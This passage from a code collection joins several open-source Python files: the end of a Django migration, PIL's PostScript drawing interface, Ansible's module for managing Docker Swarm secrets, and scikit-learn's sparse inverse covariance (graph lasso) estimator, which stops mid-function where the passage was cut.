'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'subj_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'subj_treatment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {}),
'waveform_picture': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
u'feed.unit': {
'Meta': {'ordering': "['technique', 'label']", 'object_name': 'Unit'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'unit_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'technique': ('django.db.models.fields.IntegerField', [], {}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
}
}
complete_apps = ['feed']
|
gpl-3.0
|
ardi69/pyload-0.4.10
|
lib/Python/Lib/PIL/PSDraw.py
|
20
|
6872
|
#
# The Python Imaging Library
# $Id$
#
# simple postscript graphics interface
#
# History:
# 1996-04-20 fl Created
# 1999-01-10 fl Added gsave/grestore to image method
# 2005-05-04 fl Fixed floating point issue in image (from Eric Etheridge)
#
# Copyright (c) 1997-2005 by Secret Labs AB. All rights reserved.
# Copyright (c) 1996 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
from __future__ import print_function
from PIL import EpsImagePlugin
##
# Simple Postscript graphics interface.
class PSDraw:
"""
    Sets up printing to the given file. If **fp** is omitted,
:py:attr:`sys.stdout` is assumed.
"""
def __init__(self, fp=None):
if not fp:
import sys
fp = sys.stdout
self.fp = fp
def _fp_write(self, to_write):
        if bytes is str:
            # Python 2: file objects accept str directly
            self.fp.write(to_write)
        else:
            # Python 3: encode the text to UTF-8 bytes first
            self.fp.write(bytes(to_write, 'UTF-8'))
def begin_document(self, id=None):
"""Set up printing of a document. (Write Postscript DSC header.)"""
# FIXME: incomplete
self._fp_write("%!PS-Adobe-3.0\n"
"save\n"
"/showpage { } def\n"
"%%EndComments\n"
"%%BeginDocument\n")
        # self._fp_write(ERROR_PS)  # debugging!
self._fp_write(EDROFF_PS)
self._fp_write(VDI_PS)
self._fp_write("%%EndProlog\n")
self.isofont = {}
def end_document(self):
"""Ends printing. (Write Postscript DSC footer.)"""
self._fp_write("%%EndDocument\n"
"restore showpage\n"
"%%End\n")
if hasattr(self.fp, "flush"):
self.fp.flush()
def setfont(self, font, size):
"""
Selects which font to use.
:param font: A Postscript font name
:param size: Size in points.
"""
if font not in self.isofont:
# reencode font
self._fp_write("/PSDraw-%s ISOLatin1Encoding /%s E\n" %
(font, font))
self.isofont[font] = 1
# rough
self._fp_write("/F0 %d /PSDraw-%s F\n" % (size, font))
def line(self, xy0, xy1):
"""
Draws a line between the two points. Coordinates are given in
Postscript point coordinates (72 points per inch, (0, 0) is the lower
left corner of the page).
"""
xy = xy0 + xy1
self._fp_write("%d %d %d %d Vl\n" % xy)
def rectangle(self, box):
"""
Draws a rectangle.
        :param box: A 4-tuple of integers whose order and function are
                    currently undocumented.
Hint: the tuple is passed into this format string:
.. code-block:: python
%d %d M %d %d 0 Vr\n
"""
self._fp_write("%d %d M %d %d 0 Vr\n" % box)
def text(self, xy, text):
"""
Draws text at the given position. You must use
:py:meth:`~PIL.PSDraw.PSDraw.setfont` before calling this method.
"""
text = "\\(".join(text.split("("))
text = "\\)".join(text.split(")"))
xy = xy + (text,)
self._fp_write("%d %d M (%s) S\n" % xy)
def image(self, box, im, dpi=None):
"""Draw a PIL image, centered in the given box."""
# default resolution depends on mode
if not dpi:
if im.mode == "1":
dpi = 200 # fax
else:
dpi = 100 # greyscale
# image size (on paper)
x = float(im.size[0] * 72) / dpi
y = float(im.size[1] * 72) / dpi
# max allowed size
xmax = float(box[2] - box[0])
ymax = float(box[3] - box[1])
if x > xmax:
y = y * xmax / x
x = xmax
if y > ymax:
x = x * ymax / y
y = ymax
dx = (xmax - x) / 2 + box[0]
dy = (ymax - y) / 2 + box[1]
self._fp_write("gsave\n%f %f translate\n" % (dx, dy))
if (x, y) != im.size:
# EpsImagePlugin._save prints the image at (0,0,xsize,ysize)
sx = x / im.size[0]
sy = y / im.size[1]
self._fp_write("%f %f scale\n" % (sx, sy))
EpsImagePlugin._save(im, self.fp, None, 0)
self._fp_write("\ngrestore\n")
# --------------------------------------------------------------------
# Postscript driver
#
# EDROFF.PS -- Postscript driver for Edroff 2
#
# History:
# 94-01-25 fl: created (edroff 2.04)
#
# Copyright (c) Fredrik Lundh 1994.
#
EDROFF_PS = """\
/S { show } bind def
/P { moveto show } bind def
/M { moveto } bind def
/X { 0 rmoveto } bind def
/Y { 0 exch rmoveto } bind def
/E { findfont
dup maxlength dict begin
{
1 index /FID ne { def } { pop pop } ifelse
} forall
/Encoding exch def
dup /FontName exch def
currentdict end definefont pop
} bind def
/F { findfont exch scalefont dup setfont
[ exch /setfont cvx ] cvx bind def
} bind def
"""
#
# VDI.PS -- Postscript driver for VDI meta commands
#
# History:
# 94-01-25 fl: created (edroff 2.04)
#
# Copyright (c) Fredrik Lundh 1994.
#
VDI_PS = """\
/Vm { moveto } bind def
/Va { newpath arcn stroke } bind def
/Vl { moveto lineto stroke } bind def
/Vc { newpath 0 360 arc closepath } bind def
/Vr { exch dup 0 rlineto
exch dup neg 0 exch rlineto
exch neg 0 rlineto
0 exch rlineto
100 div setgray fill 0 setgray } bind def
/Tm matrix def
/Ve { Tm currentmatrix pop
translate scale newpath 0 0 .5 0 360 arc closepath
Tm setmatrix
} bind def
/Vf { currentgray exch setgray fill setgray } bind def
"""
#
# ERROR.PS -- Error handler
#
# History:
# 89-11-21 fl: created (pslist 1.10)
#
ERROR_PS = """\
/landscape false def
/errorBUF 200 string def
/errorNL { currentpoint 10 sub exch pop 72 exch moveto } def
errordict begin /handleerror {
initmatrix /Courier findfont 10 scalefont setfont
newpath 72 720 moveto $error begin /newerror false def
(PostScript Error) show errorNL errorNL
(Error: ) show
/errorname load errorBUF cvs show errorNL errorNL
(Command: ) show
/command load dup type /stringtype ne { errorBUF cvs } if show
errorNL errorNL
(VMstatus: ) show
vmstatus errorBUF cvs show ( bytes available, ) show
errorBUF cvs show ( bytes used at level ) show
errorBUF cvs show errorNL errorNL
(Operand stack: ) show errorNL /ostack load {
dup type /stringtype ne { errorBUF cvs } if 72 0 rmoveto show errorNL
} forall errorNL
(Execution stack: ) show errorNL /estack load {
dup type /stringtype ne { errorBUF cvs } if 72 0 rmoveto show errorNL
} forall
end showpage
} def end
"""
|
gpl-3.0
|
GheRivero/ansible
|
lib/ansible/modules/cloud/docker/docker_secret.py
|
16
|
8297
|
#!/usr/bin/python
#
# Copyright 2016 Red Hat | Ansible
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: docker_secret
short_description: Manage docker secrets.
version_added: "2.4"
description:
- Create and remove Docker secrets in a Swarm environment. Similar to `docker secret create` and `docker secret rm`.
  - Adds to the metadata of new secrets 'ansible_key', a SHA-224 hash of the data, which is then used
  - in future runs to test if a secret has changed.
  - If 'ansible_key' is not present, then a secret will not be updated unless the C(force) option is set.
- Updates to secrets are performed by removing the secret and creating it again.
options:
data:
description:
- String. The value of the secret. Required when state is C(present).
required: false
labels:
description:
- "A map of key:value meta data, where both the I(key) and I(value) are expected to be a string."
- If new meta data is provided, or existing meta data is modified, the secret will be updated by removing it and creating it again.
required: false
force:
description:
- Use with state C(present) to always remove and recreate an existing secret.
- If I(true), an existing secret will be replaced, even if it has not changed.
default: false
type: bool
name:
description:
- The name of the secret.
required: true
state:
description:
- Set to C(present), if the secret should exist, and C(absent), if it should not.
required: false
default: present
choices:
- absent
- present
extends_documentation_fragment:
- docker
requirements:
- "docker-py >= 2.1.0"
- "Docker API >= 1.25"
author:
- Chris Houseknecht (@chouseknecht)
'''
EXAMPLES = '''
- name: Create secret foo
docker_secret:
name: foo
data: Hello World!
state: present
- name: Change the secret data
docker_secret:
name: foo
data: Goodnight everyone!
labels:
bar: baz
one: '1'
state: present
- name: Add a new label
docker_secret:
name: foo
data: Goodnight everyone!
labels:
bar: baz
one: '1'
# Adding a new label will cause a remove/create of the secret
two: '2'
state: present
- name: No change
docker_secret:
name: foo
data: Goodnight everyone!
labels:
bar: baz
one: '1'
# Even though 'two' is missing, there is no change to the existing secret
state: present
- name: Update an existing label
docker_secret:
name: foo
data: Goodnight everyone!
labels:
bar: monkey # Changing a label will cause a remove/create of the secret
one: '1'
state: present
- name: Force the removal/creation of the secret
docker_secret:
name: foo
data: Goodnight everyone!
force: yes
state: present
- name: Remove secret foo
docker_secret:
name: foo
state: absent
'''
RETURN = '''
secret_id:
description:
- The ID assigned by Docker to the secret object.
returned: success
type: string
sample: 'hzehrmyjigmcp2gb6nlhmjqcv'
'''
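# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the module): how the idempotency key in
# the 'ansible_key' label is derived. SecretManager stores sha224(data) at
# creation time and compares it on later runs; same data -> same key -> no
# update, changed data -> changed key -> remove and re-create.
#
#     import hashlib
#     data_key = hashlib.sha224(b'Hello World!').hexdigest()
# ---------------------------------------------------------------------------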
import hashlib
try:
from docker.errors import APIError
except ImportError:
# missing docker-py handled in ansible.module_utils.docker
pass
from ansible.module_utils.docker_common import AnsibleDockerClient, DockerBaseClass
from ansible.module_utils._text import to_native, to_bytes
class SecretManager(DockerBaseClass):
def __init__(self, client, results):
super(SecretManager, self).__init__()
self.client = client
self.results = results
self.check_mode = self.client.check_mode
parameters = self.client.module.params
self.name = parameters.get('name')
self.state = parameters.get('state')
self.data = parameters.get('data')
self.labels = parameters.get('labels')
self.force = parameters.get('force')
self.data_key = None
def __call__(self):
if self.state == 'present':
self.data_key = hashlib.sha224(to_bytes(self.data)).hexdigest()
self.present()
elif self.state == 'absent':
self.absent()
def get_secret(self):
''' Find an existing secret. '''
try:
secrets = self.client.secrets(filters={'name': self.name})
except APIError as exc:
self.client.fail("Error accessing secret %s: %s" % (self.name, to_native(exc)))
for secret in secrets:
if secret['Spec']['Name'] == self.name:
return secret
return None
def create_secret(self):
''' Create a new secret '''
secret_id = None
        # We can't see the data after creation, so we add a label that we can
        # use for an idempotency check
labels = {
'ansible_key': self.data_key
}
if self.labels:
labels.update(self.labels)
try:
if not self.check_mode:
secret_id = self.client.create_secret(self.name, self.data, labels=labels)
except APIError as exc:
self.client.fail("Error creating secret: %s" % to_native(exc))
if isinstance(secret_id, dict):
secret_id = secret_id['ID']
return secret_id
def present(self):
''' Handles state == 'present', creating or updating the secret '''
secret = self.get_secret()
if secret:
self.results['secret_id'] = secret['ID']
data_changed = False
attrs = secret.get('Spec', {})
if attrs.get('Labels', {}).get('ansible_key'):
if attrs['Labels']['ansible_key'] != self.data_key:
data_changed = True
labels_changed = False
if self.labels and attrs.get('Labels'):
# check if user requested a label change
for label in attrs['Labels']:
if self.labels.get(label) and self.labels[label] != attrs['Labels'][label]:
labels_changed = True
# check if user added a label
labels_added = False
if self.labels:
if attrs.get('Labels'):
for label in self.labels:
if label not in attrs['Labels']:
labels_added = True
else:
labels_added = True
if data_changed or labels_added or labels_changed or self.force:
# if something changed or force, delete and re-create the secret
self.absent()
secret_id = self.create_secret()
self.results['changed'] = True
self.results['secret_id'] = secret_id
else:
self.results['changed'] = True
self.results['secret_id'] = self.create_secret()
def absent(self):
''' Handles state == 'absent', removing the secret '''
secret = self.get_secret()
if secret:
try:
if not self.check_mode:
self.client.remove_secret(secret['ID'])
except APIError as exc:
self.client.fail("Error removing secret %s: %s" % (self.name, to_native(exc)))
self.results['changed'] = True
def main():
argument_spec = dict(
name=dict(type='str', required=True),
state=dict(type='str', choices=['absent', 'present'], default='present'),
data=dict(type='str', no_log=True),
labels=dict(type='dict'),
force=dict(type='bool', default=False)
)
required_if = [
('state', 'present', ['data'])
]
client = AnsibleDockerClient(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=required_if
)
results = dict(
changed=False,
secret_id=''
)
SecretManager(client, results)()
client.module.exit_json(**results)
if __name__ == '__main__':
main()
|
gpl-3.0
|
pkruskal/scikit-learn
|
sklearn/covariance/graph_lasso_.py
|
127
|
25626
|
"""GraphLasso: sparse inverse covariance estimation with an l1-penalized
estimator.
"""
# Author: Gael Varoquaux <gael.varoquaux@normalesup.org>
# License: BSD 3 clause
# Copyright: INRIA
import warnings
import operator
import sys
import time
import numpy as np
from scipy import linalg
from .empirical_covariance_ import (empirical_covariance, EmpiricalCovariance,
log_likelihood)
from ..utils import ConvergenceWarning
from ..utils.extmath import pinvh
from ..utils.validation import check_random_state, check_array
from ..linear_model import lars_path
from ..linear_model import cd_fast
from ..cross_validation import check_cv, cross_val_score
from ..externals.joblib import Parallel, delayed
import collections
# Helper functions to compute the objective and dual objective functions
# of the l1-penalized estimator
def _objective(mle, precision_, alpha):
"""Evaluation of the graph-lasso objective function
the objective function is made of a shifted scaled version of the
normalized log-likelihood (i.e. its empirical mean over the samples) and a
penalisation term to promote sparsity
"""
p = precision_.shape[0]
cost = - 2. * log_likelihood(mle, precision_) + p * np.log(2 * np.pi)
cost += alpha * (np.abs(precision_).sum()
- np.abs(np.diag(precision_)).sum())
return cost
def _dual_gap(emp_cov, precision_, alpha):
"""Expression of the dual gap convergence criterion
The specific definition is given in Duchi "Projected Subgradient Methods
for Learning Sparse Gaussians".
"""
gap = np.sum(emp_cov * precision_)
gap -= precision_.shape[0]
gap += alpha * (np.abs(precision_).sum()
- np.abs(np.diag(precision_)).sum())
return gap
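# In symbols (comment sketch): with empirical covariance S, precision K and
# p features,
#     gap = trace(S . K) - p + alpha * (||K||_1 - ||diag(K)||_1)
# where ||.||_1 is the elementwise l1 norm; the gap vanishes at the optimum
# of the penalized problem, which is why it serves as the stopping criterion
# in graph_lasso below.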
def alpha_max(emp_cov):
"""Find the maximum alpha for which there are some non-zeros off-diagonal.
Parameters
----------
emp_cov : 2D array, (n_features, n_features)
The sample covariance matrix
Notes
-----
    This results from the bound for all the Lasso problems that are solved
    in GraphLasso: each time, the row of cov corresponds to Xy. As the
    bound for alpha is given by `max(abs(Xy))`, the result follows.
"""
A = np.copy(emp_cov)
A.flat[::A.shape[0] + 1] = 0
return np.max(np.abs(A))
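# Worked example (comment sketch): for
#     emp_cov = np.array([[2.0, 0.3],
#                         [0.3, 1.0]])
# the diagonal is zeroed via the strided assignment above and
# alpha_max(emp_cov) returns 0.3, the largest absolute off-diagonal entry;
# at or above this alpha the estimated precision matrix is diagonal.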
# The g-lasso algorithm
def graph_lasso(emp_cov, alpha, cov_init=None, mode='cd', tol=1e-4,
enet_tol=1e-4, max_iter=100, verbose=False,
return_costs=False, eps=np.finfo(np.float64).eps,
return_n_iter=False):
"""l1-penalized covariance estimator
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
emp_cov : 2D ndarray, shape (n_features, n_features)
Empirical covariance from which to compute the covariance estimate.
alpha : positive float
The regularization parameter: the higher alpha, the more
regularization, the sparser the inverse covariance.
cov_init : 2D array (n_features, n_features), optional
The initial guess for the covariance.
mode : {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, optional
The maximum number of iterations.
verbose : boolean, optional
If verbose is True, the objective function and dual gap are
printed at each iteration.
return_costs : boolean, optional
If return_costs is True, the objective function and dual gap
at each iteration are returned.
eps : float, optional
The machine-precision regularization in the computation of the
Cholesky diagonal factors. Increase this for very ill-conditioned
systems.
return_n_iter : bool, optional
Whether or not to return the number of iterations.
Returns
-------
covariance : 2D ndarray, shape (n_features, n_features)
The estimated covariance matrix.
precision : 2D ndarray, shape (n_features, n_features)
The estimated (sparse) precision matrix.
costs : list of (objective, dual_gap) pairs
The list of values of the objective function and the dual gap at
each iteration. Returned only if return_costs is True.
n_iter : int
Number of iterations. Returned only if `return_n_iter` is set to True.
See Also
--------
GraphLasso, GraphLassoCV
Notes
-----
The algorithm employed to solve this problem is the GLasso algorithm,
from the Friedman 2008 Biostatistics paper. It is the same algorithm
as in the R `glasso` package.
One possible difference with the `glasso` R package is that the
diagonal coefficients are not penalized.
"""
_, n_features = emp_cov.shape
if alpha == 0:
if return_costs:
precision_ = linalg.inv(emp_cov)
cost = - 2. * log_likelihood(emp_cov, precision_)
cost += n_features * np.log(2 * np.pi)
d_gap = np.sum(emp_cov * precision_) - n_features
if return_n_iter:
return emp_cov, precision_, (cost, d_gap), 0
else:
return emp_cov, precision_, (cost, d_gap)
else:
if return_n_iter:
return emp_cov, linalg.inv(emp_cov), 0
else:
return emp_cov, linalg.inv(emp_cov)
if cov_init is None:
covariance_ = emp_cov.copy()
else:
covariance_ = cov_init.copy()
    # As a trivial regularization (Tikhonov like), we scale down the
    # off-diagonal coefficients of our starting point: this is needed, as
    # in the cross-validation the cov_init can easily be
    # ill-conditioned, and the CV loop blows up. Besides, this takes a
    # conservative standpoint on the initial conditions, and it tends to
    # make the convergence go faster.
covariance_ *= 0.95
diagonal = emp_cov.flat[::n_features + 1]
covariance_.flat[::n_features + 1] = diagonal
precision_ = pinvh(covariance_)
indices = np.arange(n_features)
costs = list()
# The different l1 regression solver have different numerical errors
if mode == 'cd':
errors = dict(over='raise', invalid='ignore')
else:
errors = dict(invalid='raise')
try:
# be robust to the max_iter=0 edge case, see:
# https://github.com/scikit-learn/scikit-learn/issues/4134
d_gap = np.inf
for i in range(max_iter):
for idx in range(n_features):
sub_covariance = covariance_[indices != idx].T[indices != idx]
row = emp_cov[idx, indices != idx]
with np.errstate(**errors):
if mode == 'cd':
# Use coordinate descent
coefs = -(precision_[indices != idx, idx]
/ (precision_[idx, idx] + 1000 * eps))
coefs, _, _, _ = cd_fast.enet_coordinate_descent_gram(
coefs, alpha, 0, sub_covariance, row, row,
max_iter, enet_tol, check_random_state(None), False)
else:
# Use LARS
_, _, coefs = lars_path(
sub_covariance, row, Xy=row, Gram=sub_covariance,
alpha_min=alpha / (n_features - 1), copy_Gram=True,
method='lars', return_path=False)
# Update the precision matrix
precision_[idx, idx] = (
1. / (covariance_[idx, idx]
- np.dot(covariance_[indices != idx, idx], coefs)))
precision_[indices != idx, idx] = (- precision_[idx, idx]
* coefs)
precision_[idx, indices != idx] = (- precision_[idx, idx]
* coefs)
coefs = np.dot(sub_covariance, coefs)
covariance_[idx, indices != idx] = coefs
covariance_[indices != idx, idx] = coefs
d_gap = _dual_gap(emp_cov, precision_, alpha)
cost = _objective(emp_cov, precision_, alpha)
if verbose:
print(
'[graph_lasso] Iteration % 3i, cost % 3.2e, dual gap %.3e'
% (i, cost, d_gap))
if return_costs:
costs.append((cost, d_gap))
if np.abs(d_gap) < tol:
break
if not np.isfinite(cost) and i > 0:
raise FloatingPointError('Non SPD result: the system is '
'too ill-conditioned for this solver')
else:
            warnings.warn('graph_lasso: did not converge after %i iterations:'
' dual gap: %.3e' % (max_iter, d_gap),
ConvergenceWarning)
except FloatingPointError as e:
e.args = (e.args[0]
+ '. The system is too ill-conditioned for this solver',)
raise e
if return_costs:
if return_n_iter:
return covariance_, precision_, costs, i + 1
else:
return covariance_, precision_, costs
else:
if return_n_iter:
return covariance_, precision_, i + 1
else:
return covariance_, precision_
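# Usage sketch (illustrative; public API of this scikit-learn era):
#
#     import numpy as np
#     from sklearn.covariance import empirical_covariance, graph_lasso
#
#     X = np.random.RandomState(0).randn(60, 5)
#     emp_cov = empirical_covariance(X)
#     cov, prec = graph_lasso(emp_cov, alpha=0.2)
#     # cov: regularized covariance, prec: its sparse inverse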
class GraphLasso(EmpiricalCovariance):
"""Sparse inverse covariance estimation with an l1-penalized estimator.
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
alpha : positive float, default 0.01
The regularization parameter: the higher alpha, the more
regularization, the sparser the inverse covariance.
mode : {'cd', 'lars'}, default 'cd'
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, default 1e-4
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, default 100
The maximum number of iterations.
verbose : boolean, default False
If verbose is True, the objective function and dual gap are
        printed at each iteration.
assume_centered : boolean, default False
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False, data are centered before computation.
Attributes
----------
covariance_ : array-like, shape (n_features, n_features)
Estimated covariance matrix
precision_ : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
n_iter_ : int
Number of iterations run.
See Also
--------
graph_lasso, GraphLassoCV
"""
def __init__(self, alpha=.01, mode='cd', tol=1e-4, enet_tol=1e-4,
max_iter=100, verbose=False, assume_centered=False):
self.alpha = alpha
self.mode = mode
self.tol = tol
self.enet_tol = enet_tol
self.max_iter = max_iter
self.verbose = verbose
self.assume_centered = assume_centered
# The base class needs this for the score method
self.store_precision = True
def fit(self, X, y=None):
X = check_array(X)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
emp_cov = empirical_covariance(
X, assume_centered=self.assume_centered)
self.covariance_, self.precision_, self.n_iter_ = graph_lasso(
emp_cov, alpha=self.alpha, mode=self.mode, tol=self.tol,
enet_tol=self.enet_tol, max_iter=self.max_iter,
verbose=self.verbose, return_n_iter=True)
return self
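# Usage sketch (illustrative): the estimator interface wraps graph_lasso.
#
#     import numpy as np
#     from sklearn.covariance import GraphLasso
#
#     X = np.random.RandomState(0).randn(60, 5)
#     model = GraphLasso(alpha=0.05).fit(X)
#     model.covariance_   # (5, 5) regularized covariance
#     model.precision_    # (5, 5) sparse inverse covariance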
# Cross-validation with GraphLasso
def graph_lasso_path(X, alphas, cov_init=None, X_test=None, mode='cd',
tol=1e-4, enet_tol=1e-4, max_iter=100, verbose=False):
"""l1-penalized covariance estimator along a path of decreasing alphas
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
X : 2D ndarray, shape (n_samples, n_features)
Data from which to compute the covariance estimate.
alphas : list of positive floats
The list of regularization parameters, decreasing order.
X_test : 2D array, shape (n_test_samples, n_features), optional
Optional test matrix to measure generalisation error.
mode : {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, optional
The maximum number of iterations.
verbose : integer, optional
The higher the verbosity flag, the more information is printed
during the fitting.
Returns
-------
covariances_ : List of 2D ndarray, shape (n_features, n_features)
The estimated covariance matrices.
precisions_ : List of 2D ndarray, shape (n_features, n_features)
The estimated (sparse) precision matrices.
scores_ : List of float
The generalisation error (log-likelihood) on the test data.
Returned only if test data is passed.
"""
inner_verbose = max(0, verbose - 1)
emp_cov = empirical_covariance(X)
if cov_init is None:
covariance_ = emp_cov.copy()
else:
covariance_ = cov_init
covariances_ = list()
precisions_ = list()
scores_ = list()
if X_test is not None:
test_emp_cov = empirical_covariance(X_test)
for alpha in alphas:
try:
# Capture the errors, and move on
covariance_, precision_ = graph_lasso(
emp_cov, alpha=alpha, cov_init=covariance_, mode=mode, tol=tol,
enet_tol=enet_tol, max_iter=max_iter, verbose=inner_verbose)
covariances_.append(covariance_)
precisions_.append(precision_)
if X_test is not None:
this_score = log_likelihood(test_emp_cov, precision_)
except FloatingPointError:
this_score = -np.inf
covariances_.append(np.nan)
precisions_.append(np.nan)
if X_test is not None:
if not np.isfinite(this_score):
this_score = -np.inf
scores_.append(this_score)
if verbose == 1:
sys.stderr.write('.')
elif verbose > 1:
if X_test is not None:
print('[graph_lasso_path] alpha: %.2e, score: %.2e'
% (alpha, this_score))
else:
print('[graph_lasso_path] alpha: %.2e' % alpha)
if X_test is not None:
return covariances_, precisions_, scores_
return covariances_, precisions_
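# Usage sketch (illustrative): warm-started estimates along a decreasing
# alpha path, with held-out scores when X_test is given.
#
#     covs, precs, scores = graph_lasso_path(X_train, alphas=[0.5, 0.1, 0.02],
#                                            X_test=X_test)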
class GraphLassoCV(GraphLasso):
"""Sparse inverse covariance w/ cross-validated choice of the l1 penalty
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
    alphas : integer, or list of positive floats, optional
If an integer is given, it fixes the number of points on the
grids of alpha to be used. If a list is given, it gives the
grid to be used. See the notes in the class docstring for
more details.
n_refinements: strictly positive integer
The number of times the grid is refined. Not used if explicit
values of alphas are passed.
cv : cross-validation generator, optional
see sklearn.cross_validation module. If None is passed, defaults to
a 3-fold strategy
tol: positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter: integer, optional
Maximum number of iterations.
mode: {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where number of features is greater
than number of samples. Elsewhere prefer cd which is more numerically
stable.
n_jobs: int, optional
number of jobs to run in parallel (default 1).
verbose: boolean, optional
If verbose is True, the objective function and duality gap are
printed at each iteration.
assume_centered : Boolean
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False, data are centered before computation.
Attributes
----------
covariance_ : numpy.ndarray, shape (n_features, n_features)
Estimated covariance matrix.
precision_ : numpy.ndarray, shape (n_features, n_features)
Estimated precision matrix (inverse covariance).
alpha_ : float
Penalization parameter selected.
cv_alphas_ : list of float
All penalization parameters explored.
`grid_scores`: 2D numpy.ndarray (n_alphas, n_folds)
Log-likelihood score on left-out data across folds.
n_iter_ : int
Number of iterations run for the optimal alpha.
See Also
--------
graph_lasso, GraphLasso
Notes
-----
The search for the optimal penalization parameter (alpha) is done on an
iteratively refined grid: first the cross-validated scores on a grid are
computed, then a new refined grid is centered around the maximum, and so
on.
    One of the challenges faced here is that the solvers can
fail to converge to a well-conditioned estimate. The corresponding
values of alpha then come out as missing values, but the optimum may
be close to these missing values.
"""
def __init__(self, alphas=4, n_refinements=4, cv=None, tol=1e-4,
enet_tol=1e-4, max_iter=100, mode='cd', n_jobs=1,
verbose=False, assume_centered=False):
self.alphas = alphas
self.n_refinements = n_refinements
self.mode = mode
self.tol = tol
self.enet_tol = enet_tol
self.max_iter = max_iter
self.verbose = verbose
self.cv = cv
self.n_jobs = n_jobs
self.assume_centered = assume_centered
# The base class needs this for the score method
self.store_precision = True
def fit(self, X, y=None):
"""Fits the GraphLasso covariance model to X.
Parameters
----------
X : ndarray, shape (n_samples, n_features)
Data from which to compute the covariance estimate
"""
X = check_array(X)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
emp_cov = empirical_covariance(
X, assume_centered=self.assume_centered)
cv = check_cv(self.cv, X, y, classifier=False)
# List of (alpha, scores, covs)
path = list()
n_alphas = self.alphas
inner_verbose = max(0, self.verbose - 1)
if isinstance(n_alphas, collections.Sequence):
alphas = self.alphas
n_refinements = 1
else:
n_refinements = self.n_refinements
alpha_1 = alpha_max(emp_cov)
alpha_0 = 1e-2 * alpha_1
alphas = np.logspace(np.log10(alpha_0), np.log10(alpha_1),
n_alphas)[::-1]
t0 = time.time()
for i in range(n_refinements):
with warnings.catch_warnings():
# No need to see the convergence warnings on this grid:
# they will always be points that will not converge
# during the cross-validation
warnings.simplefilter('ignore', ConvergenceWarning)
# Compute the cross-validated loss on the current grid
# NOTE: Warm-restarting graph_lasso_path has been tried, and
# this did not allow to gain anything (same execution time with
# or without).
this_path = Parallel(
n_jobs=self.n_jobs,
verbose=self.verbose
)(
delayed(graph_lasso_path)(
X[train], alphas=alphas,
X_test=X[test], mode=self.mode,
tol=self.tol, enet_tol=self.enet_tol,
max_iter=int(.1 * self.max_iter),
verbose=inner_verbose)
for train, test in cv)
            # Little dance to transform the list into what we need
covs, _, scores = zip(*this_path)
covs = zip(*covs)
scores = zip(*scores)
path.extend(zip(alphas, scores, covs))
path = sorted(path, key=operator.itemgetter(0), reverse=True)
# Find the maximum (avoid using built in 'max' function to
# have a fully-reproducible selection of the smallest alpha
# in case of equality)
best_score = -np.inf
last_finite_idx = 0
for index, (alpha, scores, _) in enumerate(path):
this_score = np.mean(scores)
            # absurdly large scores indicate a numerically exploded fit
            if this_score >= .1 / np.finfo(np.float64).eps:
this_score = np.nan
if np.isfinite(this_score):
last_finite_idx = index
if this_score >= best_score:
best_score = this_score
best_index = index
# Refine the grid
if best_index == 0:
# We do not need to go back: we have chosen
# the highest value of alpha for which there are
# non-zero coefficients
alpha_1 = path[0][0]
alpha_0 = path[1][0]
elif (best_index == last_finite_idx
and not best_index == len(path) - 1):
# We have non-converged models on the upper bound of the
